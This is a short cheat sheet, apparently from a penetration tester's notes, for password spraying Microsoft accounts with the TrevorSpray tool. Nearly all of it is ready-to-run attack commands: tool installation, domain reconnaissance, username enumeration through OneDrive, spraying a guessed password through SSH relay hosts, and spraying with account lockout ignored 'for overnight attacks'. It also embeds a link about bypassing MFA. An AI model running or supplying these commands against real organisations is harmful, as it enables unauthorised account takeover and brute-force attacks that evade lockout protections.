| description |
|---|
A list of tools and resources that I use for password spraying Microsoft products. |
When using TrevorSpray, consider important factors such as the delay. In my experience, setting the delay to around 100 seconds across multiple hosts has not resulted in a delay ever.
# Installation
pip install git+https://github.com/blacklanternsecurity/trevorproxy
pip install git+https://github.com/blacklanternsecurity/trevorspray
# Perform recon against a domain
trevorspray --recon $domain
# Enumerate users via OneDrive
trevorspray --recon $domain -u $emails --threads 3
# Spray with a 10 second delay between requests
trevorspray -u $validemails -p 'Winter2022!' --delay 10
# Spray with two robins and the current system
trevorspray -u $validemails -p 'Winter2022!' --ssh root@$robin root@$robin
# Spray while ignoring account lockout (good for overnight attacks)
trevorspray -u $validemails -p $passwords --ignore-lockouts{% embed url="https://github.com/blacklanternsecurity/TREVORspray#example-find-valid-usernames-without-osint-d" %}
{% embed url="https://www.sprocketsecurity.com/resources/how-to-bypass-mfa-all-day" %}